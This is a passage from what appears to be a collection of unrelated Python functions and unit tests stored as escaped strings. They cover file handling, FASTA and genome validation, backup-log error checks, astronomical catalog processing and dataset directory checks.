path.basename(file_name))\n npsize = npsize + 1\n elif submit[5] == 'MULTI2':\n for itmp_file_name in listdir('.'):\n if itmp_file_name.count(tmp_file_name) == 1:\n base, ext = path.splitext(file_name)\n new_tmp_file_name = \\\n itmp_file_name.lower()\\\n .replace(tmp_file_name.lower(),\n base)\n new_file_name = path.join(cas_dir, new_tmp_file_name) + ext\n if path.isfile(new_file_name):\n base, ext = path.splitext(new_file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(new_file_name, base+'_old'+str(i)+ext)\n shutil.move(itmp_file_name, new_file_name)\n print(' moving: '+ path.basename(new_file_name))\n else:\n file_name = path.join(cas_dir, file_name)\n if path.isfile(file_name):\n base, ext = path.splitext(file_name)\n i = 0\n # this would be an infinite loop only if you have an\n # inifite number of files\n while 1:\n i = i + 1\n if not path.isfile(base+'_old'+str(i)+ext):\n break\n shutil.move(file_name, base+'_old'+str(i)+ext)\n if not path.isfile(tmp_file_name):\n xcpt.append({'name':'process_ecr',\n 'msg':'did not create outfile: '+\\\n path.basename(file_name)+' ('+tmp_file_name+')'})\n continue\n shutil.move(tmp_file_name, file_name)\n print(' moving: '+ path.basename(file_name))\n\n # ~~~ copy the sortie file(s) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n sortiefiles = []\n if sortiefile != None:\n crun = path.basename(sortiefile)\n cref = path.join(cas_dir, sortiefile)\n if not path.isfile(crun):\n xcpt.append({'name':'process_ecr',\n 'msg':'did not create listing file: '+\\\n path.basename(cref)+' ('+crun+')'})\n raise TelemacException(xcpt) # raise full report\n shutil.copy(crun, cref)\n print(' copying: '+ path.basename(cref))\n sortiefiles.append(cref)\n\n # ~~~> If in parallel, also copy the slave log files\n # called PEnnnnn_xxxxx.log\n # for slave x of n but for the last one called the sortie file\n if ncsize > 1:\n for i in range(ncsize-1):\n slavefile = 'PE{0:05d}-{1:05d}.LOG'.format(ncsize-1, i+1)\n base, ext = path.splitext(sortiefile)\n slogfile = base+'_p'+'{0:05d}'.format(i+1)+ext\n crun = slavefile\n cref = path.join(cas_dir, slogfile)\n if not path.isfile(crun):\n xcpt.append({'name':'process_ecr',\n 'msg':'could not find the listing file: '\\\n + crun})\n raise TelemacException(xcpt) # raise full report\n shutil.copy(crun, cref)\n print(' copying: '+ path.basename(cref))\n sortiefiles.append(cref)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n if xcpt != []:\n raise TelemacException(xcpt) # raise full report\n return sortiefiles", "def check_all_files_and_dirs(self):\n err = 0\n err_m = ''\n warning = 0\n warning_m = ''\n # Check the pdb file for refinement\n if self.refine_pdb_in == None:\n err = 1\n err_m += '\\nPdb file should be supplied'\n else:\n if self.check_single_file(self.refine_pdb_in):\n self.refine_pdb_in = os.path.abspath(self.refine_pdb_in)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(self.refine_pdb_in)\n\n # Check the pdb file for distance analysis\n if self.check_single_file(self.X8_pdb_in):\n self.X8_pdb_in = os.path.abspath(self.X8_pdb_in)\n else:\n self.X8_pdb_in != None\n warning = 1\n warning_m += '\\nXtrapol8 pdb_in not found. No additional analysis will be applied'\n\n # Check additional files and append them to a string\n additional = \"\"\n for fle in self.additional:\n if len(fle)>0:\n if self.check_single_file(fle):\n new_add = os.path.abspath(fle)\n additional = additional + \"%s \" % (new_add)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(fle)\n self.additional = additional\n\n #Check the output directory\n if os.path.isdir(self.outdir):\n self.outdir = os.path.abspath(self.outdir)\n else:\n err = 1\n err_m += \"\\nXtrapol8 output directory cannot be found.\" \\\n \"Please run this from the same directory from which you ran Xtrapol8.\"\n\n #Check the phil file for reciprocal space refinement\n if self.check_single_file(self.reciprocal_space_phil):\n self.reciprocal_space_phil = os.path.abspath(self.reciprocal_space_phil)\n else:\n self.reciprocal_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for reciprocal space refinement not found. Refinement will use default parameters.'\n\n\n #Check the phil file for real space refinement\n if self.check_single_file(self.real_space_phil):\n self.real_space_phil = os.path.abspath(self.real_space_phil)\n else:\n self.real_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for real space refinement not found. Refinement will use default parameters.'\n\n #Check the residue list for distance analysis\n if self.check_single_file(self.residue_list):\n self.residue_list = os.path.abspath(self.residue_list)\n else:\n self.residue_list = None\n warning = 1\n warning_m += '\\nResidue list not found. Distance analysis (if required) will be performed without residue list.'\n\n return err, err_m, warning, warning_m", "def test_differ_times_one_file(generate_differ_times_one_file):\n fname = generate_differ_times_one_file\n with pytest.raises(Exception):\n process_files([fname])", "def check_entry(self, controller, entries, list_of_project_info, error_label):\r\n\r\n for x in range(0, len(entries)):\r\n if entries[x].get() == \"\":\r\n messagebox.showerror(\"Error\", \"Expected no empty fields\")\r\n return\r\n if not entries[2].get().isalpha():\r\n messagebox.showerror(\"Error\", \"Expected column in letter not number, e.g. 'B' \")\r\n return\r\n name_col = self.col_to_num(entries[2].get())\r\n self.write_to_indata(entries)\r\n\r\n list_error,error_present = [], []\r\n list_error = controller.start_config(entries, name_col, list_error, list_of_project_info)\r\n if len(list_error) == 0:\r\n message = \"Successfully generated all state files\"\r\n error_present.append(message)\r\n error_label.config(text=\"Successfully generated all state files\")\r\n else:\r\n for element in list_error:\r\n if element.error_type == \"1\": # error in loop_trough_row\r\n message = \"expected error in excel spreadsheet at row\" + str(element.file_name) + \"\\n\"\r\n elif element.error_type == \"2\": #filname missing\r\n message = \"expected error in file \" + str(element.file_name)+ \"\\n\"\r\n elif element.error_type == \"3\": # Filename error\r\n message = \"expected error in file name at row \" + str(element.file_name) + \"\\n\"\r\n elif element.error_type == \"4\": # \"Seems like error in 1:st or 3:rd line in excel sheet\"\r\n message = \"expected error in excel spreadsheet on 1:st or 3:rd row \" + \"\\n\"\r\n error_present.append(message)\r\n error_report = open(\"error_report.txt\", \"w+\")\r\n error_report.write(''.join(error_present))\r\n error_report.close()\r\n error_label.config(text=\"Error occured, check error report in \"+ entries[1].get())\r\n # error_label.config(text=(''.join(error_present)))\r", "def test_check_cds_6(self):\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\")\n self.assertEqual(count, 0)", "def test_differentSizedDetectors(self):\n files = [getFile(fp)\n for fp in ['bwr_0_det0.m', 'bwr_smallxy_det0.m']]\n self._raisesMisMatchError(files)\n self.assertMsgInLogs(\n \"ERROR\", \"shape: Parser files\",\n partial=True)", "def checkFiles(genomesList):\n global GENOMES\n newGenomesList = []\n\n for genome_file in genomesList:\n flag = 0\n\n #Going through the file to confirm it is a valid fasta file\n for record in SeqIO.parse(genome_file, \"fasta\"):\n match = re.search('(^[a-zA-Z]+)', str(record.seq))\n if not match:\n flag = 0\n break\n else:\n flag = 1\n\n if flag>0:\n newGenomesList.append(genome_file)\n\n filename = os.path.basename(genome_file)\n filename = os.path.splitext(filename)\n\n #Go through the file to obtain the genome name\n for record in SeqIO.parse(genome_file,\"fasta\"):\n genome_name = getGenomeName(record.description, filename[0])\n if not genome_name in GENOMES:\n GENOMES[genome_name] = ''\n\n else:\n logging.warning(\"File \" + genome_file + \" is in invalid format\")\n\n if not newGenomesList:\n logging.error(\"No valid fasta files \\n Exiting\")\n return 'Error'\n\n else:\n return sorted(newGenomesList)", "def test_validate_fasta_with_invalid(self):\r\n\r\n validate_fasta(self.sample_fasta_invalid_fp, self.sample_mapping_fp,\r\n self.output_dir)\r\n\r\n expected_log_fp = join(self.output_dir,\r\n split(self.sample_fasta_invalid_fp)[1] + \"_report.log\")\r\n\r\n log_f = open(expected_log_fp, \"U\")\r\n actual_log_lines = [line.strip() for line in log_f][1:]\r\n\r\n expected_log_lines = \"\"\"Percent duplicate labels: 0.250\r\nPercent QIIME-incompatible fasta labels: 0.500\r\nPercent of labels that fail to map to SampleIDs: 0.750\r\nPercent of sequences with invalid characters: 0.500\r\nPercent of sequences with barcodes detected: 0.250\r\nPercent of sequences with barcodes detected at the beginning of the sequence: 0.000\r\nPercent of sequences with primers detected: 0.250\r\nDuplicate labels found:\r\nseq1\"\"\".split('\\n')\r\n\r\n self.assertEqual(actual_log_lines, expected_log_lines)", "def final_output_analysis(samples_dict, dir_results_path):\n with open(path.join(dir_results_path, 'corrupted_processes.txt'), 'w', encoding='utf-8', errors='replace') as c_out:\n with open(path.join(dir_results_path, 'analysis.txt'), 'w', encoding='utf-8', errors='replace') as i_out:\n with open(path.join(dir_results_path, 'syscalls.txt'), 'w', encoding='utf-8', errors='replace') as s_out:\n for uuid in sorted(samples_dict.keys()):\n reduced_sample = samples_dict[uuid]\n\n i_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n s_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n c_out.write('{} {}\\n'.format(string_utils.filename, uuid))\n\n # corrupted processes section\n process_repr = '\\t\\t{:15s}\\t{:10d}\\t{:15s}\\tby:\\t{:15s}\\t{:10d}\\n'\n for process in reduced_sample.corrupted_processes:\n c_out.write(process_repr.format(process[0],\n process[1],\n process[2],\n process[3],\n process[4]))\n\n # instruction count section\n i_out.write(string_utils.out_final + '\\t' + str(reduced_sample.total_instruction) + '\\n')\n i_out.write(string_utils.out_terminating + '\\t' + str(reduced_sample.terminate_all) + '\\t')\n i_out.write(string_utils.out_sleeping + '\\t' + str(reduced_sample.sleep_all) + '\\t')\n i_out.write(string_utils.out_crashing + '\\t' + str(reduced_sample.crash_all) + '\\t')\n i_out.write(string_utils.out_raising_error + '\\t' + str(reduced_sample.error_all) + '\\t')\n i_out.write(string_utils.out_writes_file + '\\t' + str(reduced_sample.write_file) + '\\n')\n\n # system calls count section\n s_out.write(string_utils.syscall_final + '\\t' + str(reduced_sample.total_syscalls) + '\\n')\n\n i_out.write('\\n')\n s_out.write('\\n')\n c_out.write('\\n')", "def merge(self , station = '' , datasets = '' , mode = 'test'):\n\n if mode == \"test\": \n a = self.initialize_data( station = station, datasets = datasets ) # reading the input files \n dummy = self.merge_all_data() \n #logging.info('*** Finished merging, now writing the output netCDF file ***' ) \n #a = self.write_merged_file()\n #logging.info('*** Done writing the output ! ***')\n return True\n\n else:\n o = open(\"FAILED_MERGING_LIST.txt\", 'a+') \n try:\n a = self.initialize_data( station = station, datasets = datasets ) # reading the input files \n dummy = self.merge_all_data() \n #logging.info('*** Finished merging, now writing the output netCDF file ***' ) \n #a = self.write_merged_file()\n #logging.info('*** Done writing the output ! ***')\n return True \n except MemoryError:\n print('Failed: ' , station )\n o.write(station + '\\n' )\n return False", "def test_errors_on_output(self):\n mb = self.maria_backup\n\n # normal run\n errors = b\"\"\"\n 220309 11:19:09 Finished backing up non-InnoDB tables and files\n 220309 11:19:09 Executing FLUSH NO_WRITE_TO_BINLOG ENGINE LOGS...\n xtrabackup: The latest check point (for incremental): '92134324'\n xtrabackup: Stopping log copying thread..\n 220309 11:19:10 >> log scanned up to (900123121)\n 220309 11:19:10 Executing UNLOCK TABLES\n 220309 11:19:10 All tables unlocked\n 220309 11:19:10 Backup created in directory '/a/dir'\n 220309 11:19:10 [00] Writing backup-my.cnf\n 220309 11:19:10 [00] ...done\n 220309 11:19:10 [00] Writing xtrabackup_info\n 220309 11:19:10 [00] ...done\n xtrabackup: Transaction log of lsn (89423125) to (900123121) was copied.\n 220309 11:19:10 completed OK!\n \"\"\"\n self.assertFalse(mb.errors_on_output(b'', errors))\n\n # failed run\n errors = b\"\"\"\n xtrabackup: error: log block numbers mismatch:\n xtrabackup: error: expected log block no. 293842034, but got no. 13324598 from the log file.\n xtrabackup: error: it looks like InnoDB log has wrapped around before xtrabackup\n could process all records due to either log copying being too slow, or log files being too small.\n xtrabackup: Error: xtrabackup_copy_logfile() failed\n \"\"\"\n self.assertTrue(mb.errors_on_output(b'', errors))", "def testCTIcorrectionNonoise(log, files, output, sigma=0.75, iterations=4):\n eclean = []\n e1clean = []\n e2clean = []\n R2clean = []\n xclean = []\n yclean = []\n eCTI = []\n e1CTI = []\n e2CTI = []\n R2CTI = []\n xCTI = []\n yCTI = []\n eCTIfixed = []\n e1CTIfixed = []\n e2CTIfixed = []\n R2CTIfixed = []\n xCTIfixed = []\n yCTIfixed = []\n\n fh = open(output.replace('pk', 'csv'), 'w')\n fh.write('#file, delta_e, delta_e1, delta_e2, delta_R2, delta_x, delta_y\\n')\n for f in files:\n print 'Processing: ', f\n\n #reset settings\n settings = dict(sigma=sigma, iterations=iterations)\n\n #load no cti data\n nocti = pf.getdata(f.replace('CUT', 'CUTnoctinonoise'))\n\n #load CTI data\n CTI = pf.getdata(f)\n\n sh = shape.shapeMeasurement(nocti, log, **settings)\n results = sh.measureRefinedEllipticity()\n\n eclean.append(results['ellipticity'])\n e1clean.append(results['e1'])\n e2clean.append(results['e2'])\n R2clean.append(results['R2'])\n xclean.append(results['centreX'])\n yclean.append(results['centreY'])\n\n #CTI, fitted centroid\n sh = shape.shapeMeasurement(CTI.copy(), log, **settings)\n results2 = sh.measureRefinedEllipticity()\n\n eCTI.append(results2['ellipticity'])\n e1CTI.append(results2['e1'])\n e2CTI.append(results2['e2'])\n R2CTI.append(results2['R2'])\n xCTI.append(results2['centreX'])\n yCTI.append(results2['centreY'])\n\n #fixed centroid\n settings['fixedPosition'] = True\n settings['fixedX'] = results['centreX']\n settings['fixedY'] = results['centreY']\n settings['iterations'] = 1\n sh = shape.shapeMeasurement(CTI.copy(), log, **settings)\n results3 = sh.measureRefinedEllipticity()\n\n eCTIfixed.append(results3['ellipticity'])\n e1CTIfixed.append(results3['e1'])\n e2CTIfixed.append(results3['e2'])\n R2CTIfixed.append(results3['R2'])\n xCTIfixed.append(results3['centreX'])\n yCTIfixed.append(results3['centreY'])\n\n text = '%s,%e,%e,%e,%e,%e,%e\\n' % (f, results['ellipticity'] - results2['ellipticity'],\n results['e1'] - results2['e1'], results['e2'] - results2['e2'], results['R2'] - results2['R2'],\n results['centreX'] - results2['centreX'], results['centreY'] - results2['centreY'])\n fh.write(text)\n print text\n\n fh.close()\n\n results = {'eclean' : np.asarray(eclean),\n 'e1clean' : np.asarray(e1clean),\n 'e2clean' : np.asarray(e2clean),\n 'R2clean' : np.asarray(R2clean),\n 'xclean' : np.asarray(xclean),\n 'yclean' : np.asarray(yclean),\n 'eCTI' : np.asarray(eCTI),\n 'e1CTI' : np.asarray(e1CTI),\n 'e2CTI' : np.asarray(e2CTI),\n 'R2CTI' : np.asarray(R2CTI),\n 'xCTI' : np.asarray(xCTI),\n 'yCTI' : np.asarray(yCTI),\n 'eCTIfixed': np.asarray(eCTIfixed),\n 'e1CTIfixed': np.asarray(e1CTIfixed),\n 'e2CTIfixed': np.asarray(e2CTIfixed),\n 'R2CTIfixed': np.asarray(R2CTIfixed),\n 'xCTIfixed': np.asarray(xCTIfixed),\n 'yCTIfixed': np.asarray(yCTIfixed)}\n\n #save to a file\n fileIO.cPickleDumpDictionary(results, output)\n\n return results", "def test_all_merge(self):\n\n test_folder = os.path.join('test_data', 'merging_tests', 'batch_test')\n # test_folder = base_path + '/test_data/merging_tests/batch_test/'\n results_folder = os.path.join(test_folder, 'results')\n # results_folder = test_folder+\"results/\"\n\n if not os.path.isdir(results_folder):\n os.mkdir(results_folder)\n\n # delete all files in output folder\n for the_file in os.listdir(results_folder):\n file_path = os.path.join(results_folder, the_file)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n\n backgrounds_folder = os.path.join(test_folder, 'backgrounds')\n obj_poses_folder = os.path.join(test_folder, 'object_poses')\n\n mi.generate_for_all_objects(obj_poses_folder, backgrounds_folder, results_folder, adjust_brightness = True)\n self.assertEqual(len(os.listdir(obj_poses_folder)), len(os.listdir(results_folder)))\n\n for the_file in os.listdir(results_folder):\n file_path = os.path.join(results_folder, the_file)\n im = Image.open(file_path)\n self.assertEqual((300,300), im.size)\n self.assertEqual('JPEG', im.format)\n self.assertNotEqual('PNG', im.format)", "def test_assign_seqs_error_correction(self):\r\n\r\n # Handles single fasta and single qual with error correction\r\n file_data = {}\r\n file_data['fasta_files'] = [self.valid_fasta_file_with_bc_errors]\r\n file_data['qual_files'] = [self.valid_qual_file_no_errors]\r\n file_data['demultiplexed_seqs_f'] = FakeOutFile()\r\n file_data['demultiplexed_qual_f'] = FakeOutFile()\r\n\r\n ids_bcs_added_field = {('AACTCGTCGATG', ''): 's1',\r\n ('AGCAGCACTTGT', ''): 's2', ('ACCGCAGAGTCA', ''): 's3'}\r\n bc_lens = [12]\r\n all_bcs = ['AACTCGTCGATG', 'AGCAGCACTTGT', 'ACCGCAGAGTCA']\r\n keep_barcode = False\r\n barcode_type = \"golay_12\"\r\n max_bc_errors = 1.5\r\n start_index = 1\r\n write_unassigned_reads = False\r\n disable_bc_correction = False\r\n added_demultiplex_field = None\r\n\r\n log_data, bc_freqs, seq_counts, corrected_bc_count =\\\r\n assign_seqs(file_data, ids_bcs_added_field, bc_lens, all_bcs,\r\n keep_barcode, barcode_type, max_bc_errors, start_index,\r\n write_unassigned_reads, disable_bc_correction,\r\n added_demultiplex_field)\r\n\r\n expected_demultiplexed_fasta_seq = '>s1_1 ABCD0001 orig_bc=TACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=1\\nCAGGACGAGACGAGGTT\\n>s3_2 EFGH0002 orig_bc=GCCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=1\\nCCAGATTACGAGATTA\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n'\r\n expected_demultiplexed_qual_seq = '>s1_1 ABCD0001 orig_bc=TACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=1\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_2 EFGH0002 orig_bc=GCCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=1\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 17 13\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n'\r\n self.assertEqual(file_data['demultiplexed_seqs_f'].data,\r\n expected_demultiplexed_fasta_seq)\r\n self.assertEqual(file_data['demultiplexed_qual_f'].data,\r\n expected_demultiplexed_qual_seq)\r\n\r\n expected_log_data = {'ACCGCAGAGTCA,s3': 1, 'AACTCGTCGATG,s1': 1,\r\n 'AGCAGCACTTGT,s2': 1}\r\n expected_bc_freqs = {'TACTCGTCGATG': 1, 'GCCGCAGAGTCA': 1,\r\n 'AGCAGCACTTGT': 1}\r\n expected_seq_counts = 3\r\n expected_corrected_bc_count = [2, 0]\r\n\r\n self.assertEqual(log_data, expected_log_data)\r\n self.assertEqual(bc_freqs, expected_bc_freqs)\r\n self.assertEqual(seq_counts, expected_seq_counts)\r\n self.assertEqual(corrected_bc_count, expected_corrected_bc_count)", "def test_validation_wrong_molecules():\n paths = examples_paths()\n paths['wrongformat'] = utils.get_data_filename(os.path.join('tests', 'data', 'README.md'))\n molecules = [\n {'antechamber': {'charge_method': 'bcc'}},\n {'filepath': paths['wrongformat']},\n {'name': 'p-xylene', 'antechamber': {'charge_method': 'bcc'}, 'unknown': 4},\n {'smiles': 'Cc1ccccc1', 'openeye': {'quacpac': 'am1-bcc'}},\n {'smiles': 'Cc1ccccc1', 'openeye': {'quacpac': 'invalid'},\n 'antechamber': {'charge_method': None}},\n {'smiles': 'Cc1ccccc1', 'openeye': {'quacpac': 'am1-bcc'},\n 'antechamber': {'charge_method': 'bcc'}},\n {'filepath': 'nonexistentfile.pdb', 'leap': {'parameters': 'leaprc.ff14SB'}},\n {'filepath': paths['toluene'], 'smiles': 'Cc1ccccc1'},\n {'filepath': paths['toluene'], 'strip_protons': True},\n {'filepath': paths['abl'], 'leap': {'parameters': 'oldff/leaprc.ff14SB'}, 'epik': {'select': 0}},\n {'name': 'toluene', 'epik': 0},\n {'name': 'toluene', 'epik': {'tautomerize': 6}},\n {'name': 'toluene', 'epik': {'extract_range': 1}},\n {'name': 'toluene', 'smiles': 'Cc1ccccc1'},\n {'name': 3},\n {'smiles': 'Cc1ccccc1', 'select': 1},\n {'name': 'Cc1ccccc1', 'select': 1},\n {'filepath': paths['abl'], 'leap': {'parameters': 'oldff/leaprc.ff14SB'}, 'select': 'notanoption'},\n {'filepath': paths['abl'], 'regions': 5},\n {'filepath': paths['abl'], 'regions': {'a_region': [-56, 5.23]}},\n {'filepath': paths['toluene'], 'leap': {'parameters': 'leaprc.gaff'}, 'strip_protons': True},\n ]\n for molecule in molecules:\n yield assert_raises, YamlParseError, ExperimentBuilder._validate_molecules, {'mol': molecule}", "def test_combine_alignments(self):\n lines1 = ['>a','AATTGGCC','>b','AATTAATT']\n lines2 = ['>c','AATTAGCC','>d','AATTGATT']\n exp = {'a':'AATTGGCC','b':'AATTAATT', \n 'c':'AATTAGCC','d':'AATTGATT'}\n obs = combine_alignments(lines1, lines2)\n self.assertEqual(obs, exp)\n\n lines1 = ['>a','AATTGGCC','>b','AATTAATT']\n lines2 = ['>a','AATTAACC','>C','AATTGATT']\n self.assertRaises(ValueError, combine_alignments, lines1, lines2)", "def test_strain_not_in(generate_no_strain_one_file):\n fname = generate_no_strain_one_file\n with pytest.raises(Exception) as f:\n process_files([fname])", "def test_content_file(self):\n\n url=[\"http://archive.ics.uci.edu/ml/machine-learning-databases/wine/wine.data\",\n \"http://archive.ics.uci.edu/ml/machine-learning-databases/car/car.data\",\n \"http://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"]\n cwd=os.getcwd()\n list_of_files=requester.batch_url_to_csv(url, fnames=[\"m1\", \"m2\",\"m3\"])\n total_rows=0\n reader_list=[]\n for j in range(len(list_of_files)):\n reader=csv.DictReader(list_of_files[j])\n for rows in reader:\n total_rows+=1\n reader_list.append(total_rows)\n\n unique=set((reader_list))\n if len(unique)!=len(reader_list):\n with self.assertRaises(AssertionError):\n requester.batch_url_to_csv(url,fnames=['m1','m2','m3'])", "def makeObjcats(self):\n curdir = os.getcwd()\n os.chdir(self.astromdir)\n # make the sxtr paramfiles and run with them\n self._setupSxtrFiles()\n\n self.objcats = []\n self.projcats = []\n for imsci in self.sciImlist:\n rmsfile = imsci.split(\"_sci\")[0]+'_RMS.fits'\n if rmsfile not in self.rmsImlist:\n errtxt = \"Expected file %s not in rmsImlist!\" %rmsfile\n self.logfile.write(errtxt)\n self.errorList.append((self.modName,errtxt))\n return -1\n tmpcat = imsci.split(\"_sci\")[0]+'.tmp'\n cmd = 'sex %s -c %s -CATALOG_NAME %s -WEIGHT_IMAGE %s' \\\n %(os.path.join(self.Imagedir,imsci), self.inparFile, \\\n tmpcat, os.path.join(self.Imagedir,rmsfile))\n self.logfile.write(' '+cmd)\n sproc = popen2.Popen4(cmd, 1)\n errs = sproc.fromchild.readlines()\n sproc.fromchild.close()\n\n if errs:\n self.logfile.write(\"Sxtr seems to have choked a bit:\")\n for line in errs:\n self.logfile.write(line)\n self.errorList.append((self.modName,line))\n\n try:\n sxtlines = open(tmpcat).readlines()\n except:\n sxtlines = []\n del cmd,sproc,rmsfile,errs,tmpcat\n # refine that catalog, please\n objcat = imsci.split(\"_sci\")[0]+'.obj'\n projcat = imsci.split(\"_sci\")[0]+'.proj'\n fp = open(objcat,'w')\n ngood=0\n\n # the following seems very contrived, but helps in some cases\n if len(sxtlines)<250: bigMagerr = 0.4\n else: bigMagerr = 0.35\n self.logfile.write('cat: %s Magerr_lim: %.2f' %(objcat,bigMagerr))\n for line in sxtlines:\n flds = line.split()\n if len(flds)<9 or flds[0][0] == '#':\n continue\n mag = float(flds[3])\n magerr = float(flds[4])\n ellip = float(flds[5])\n fwhm = float(flds[6])\n a_im = float(flds[7])\n b_im = float(flds[8])\n if(magerr>bigMagerr or ellip>0.7 or b_im < 0.6 or max(a_im,fwhm/2)>400):\n continue\n fp.write(line)\n ngood += 1\n fp.close()\n if ngood>5:\n self.objcats.append(objcat)\n else:\n continue\n\n # finally, write the file with projected coord offsets\n cmd = 'project_coords %s 1 2 %.6f %.6f outfile=%s asec' \\\n %(objcat,self.RActr,self.Decctr,projcat)\n self.logfile.write(\"**> \"+cmd)\n projcoords = popen2.Popen4(cmd)\n _outlines = projcoords.fromchild.readlines()\n projcoords.fromchild.close()\n if len(_outlines) > 0:\n # I've never seen this happen, but better check...\n errtxt = \"ERROR: project_coords mysteriously failed!\"\n self.logfile.write(errtxt)\n self.errorList.append((self.modName,errtxt))\n for _line in _outlines:\n self.logfile.write(_line)\n print _line\n return -1\n self.projcats.append(projcat)\n self.logfile.write(\"Object astrometric catalog %s constructed.\"%projcat)\n del projcoords,cmd,objcat,projcat\n # ok, all done making catalogs for this image\n \n\tos.chdir(curdir)\n if len(self.objcats) < 1:\n self.logfile.write(\"makeObjCats: No catalogs made for matching?\")\n return -1\n self.logfile.write(\"Made %d object catalogs for matching.\"%len(self.objcats))\n return 0", "def _check_missing_files_in_folder(self, expected_list_of_files):\n missing_files = [\n file_name for file_name in expected_list_of_files if self.folder_path / file_name not in self._ome_tif_files\n ]\n assert (\n not missing_files\n ), f\"Some of the TIF image files at '{self.folder_path}' are missing. The list of files that are missing: {missing_files}\"", "def validate_matching_cif_files():\n for refcode in FRAMEWORKS_DF['CSD refcode'].str:\n assert Path(CIF_DIR / (str(refcode) + '.cif')).is_file", "def test_css_bottom_files_ordered(self):\n \n top, std, bottom = heavy_lifting.organize_css_files(self.fake_file_list)\n \n if len(bottom) > 1 and len(list_css_bottom_files()) > 1:\n for found_file in bottom:\n found_file_name = os.path.basename(found_file)\n \n \n for f_file_again in bottom:\n f_file_again_name = os.path.basename(f_file_again)\n \n if not found_file_name == f_file_again_name:\n if bottom.index(found_file) > bottom.index(f_file_again):\n self.assertGreater(list_css_bottom_files().index(found_file_name), list_css_bottom_files().index(f_file_again_name))\n \n if bottom.index(found_file) < bottom.index(f_file_again):\n self.assertLess(list_css_bottom_files().index(found_file_name), list_css_bottom_files().index(f_file_again_name))", "def check(self):\n if not os.path.exists(config.configured_root_path):\n raise c8e('root path of data set not exist' + config.configured_root_path)\n \n for it in config.configured_dirs:\n self.__path[it] = os.path.join(config.configured_root_path, it)\n \n for l1 in os.listdir(config.configured_root_path): #1st level directory: train/valid/test\n l1path = os.path.join(config.configured_root_path, l1)\n if not os.path.isdir(l1path):\n raise c8e('regular file exists in data set' + l1)\n \n if l1 not in config.configured_dirs:\n raise c8e('wrong dir in data set' + l1)\n \n for l2 in os.listdir(l1path): #2nd level directory, red/yellow/green\n l2path = os.path.join(l1path, l2)\n if not os.path.isdir(l2path):\n raise c8e('regular file exists in data set' + l2path)\n \n if l2 not in config.configured_classes:\n raise c8e('wrong dir in data set' + l2path)\n \n for l3 in os.listdir(l2path): #3rd level files \n self._check_image(l2path, l3)\n \n #statistic\n self.__phase_sample_count[l1] += 1\n self.__area_sample_count[l2] += 1\n if l1 == config.configured_train_dir:\n self.__train_sample_count[l2] += 1\n \n #process weight of each class of train directory\n total = np.sum(list(self.__train_sample_count.values())) \n max_samples = np.max(list(self.__train_sample_count.values())) #Max\n mu = 1. / (total / float(max_samples)) #\n keys = self.__train_sample_count.keys()\n for key in keys:\n score = math.log(mu * total / float(self.__train_sample_count[key]))\n self.__class_weight[int(key)] = score if score > 1. else 1.", "def check_names(treat, control, error_stream):\n tchrnames = set(treat.get_chr_names())\n cchrnames = set(control.get_chr_names())\n commonnames = tchrnames.intersection(cchrnames)\n if len(commonnames)==0:\n error_stream(\"No common chromosome names can be found from treatment and control!\")\n error_stream(\"Please make sure that the treatment and control alignment files were generated by using the same genome assembly!\")\n error_stream(\"Chromosome names in treatment: %s\" % \",\".join(sorted(tchrnames)))\n error_stream(\"Chromosome names in control: %s\" % \",\".join(sorted(cchrnames)))\n sys.exit()", "def test_check_cds_15(self):\n self.cds1.locus_tag = \"\"\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\", \"warning\")\n self.assertEqual(count, 2)", "def test_bulk_group_errors(self):\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_actg_missing_col)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n res = self.client.post(self.ag_url, data)\n assert res.status_code == status.HTTP_400_BAD_REQUEST", "def test_multiple_output_files(self):\r\n convert_fastaqual(self.fasta_file_path,\r\n multiple_output_files=True,\r\n output_directory=self.output_dir,\r\n per_file_buffer_size=23)\r\n\r\n sample_id_s = [('PC.634', expected_fasta_634_default,\r\n expected_qual_634_default),\r\n ('PC.354', expected_fasta_354_default,\r\n expected_qual_354_default),\r\n ('PC.481', expected_fasta_481_default,\r\n expected_qual_481_default)]\r\n for sample_id, expected_fasta, expected_qual in sample_id_s:\r\n actual_output_fasta_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.fna',\r\n self.output_dir)\r\n\r\n actual_output_qual_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.qual',\r\n self.output_dir)\r\n\r\n actual_output_fasta = open(actual_output_fasta_path)\r\n actual_output_qual = open(actual_output_qual_path)\r\n actual_fasta = actual_output_fasta.read()\r\n actual_output_fasta.close()\r\n actual_qual = actual_output_qual.read()\r\n actual_output_qual.close()\r\n self._files_to_remove.append(actual_output_fasta_path)\r\n self._files_to_remove.append(actual_output_qual_path)\r\n\r\n self.assertEquals(actual_fasta, expected_fasta)\r\n self.assertEquals(actual_qual, expected_qual)", "def check_analysis_pickle_files(self):\n # Make sure that there have been no more trials run since this\n # last processing. To 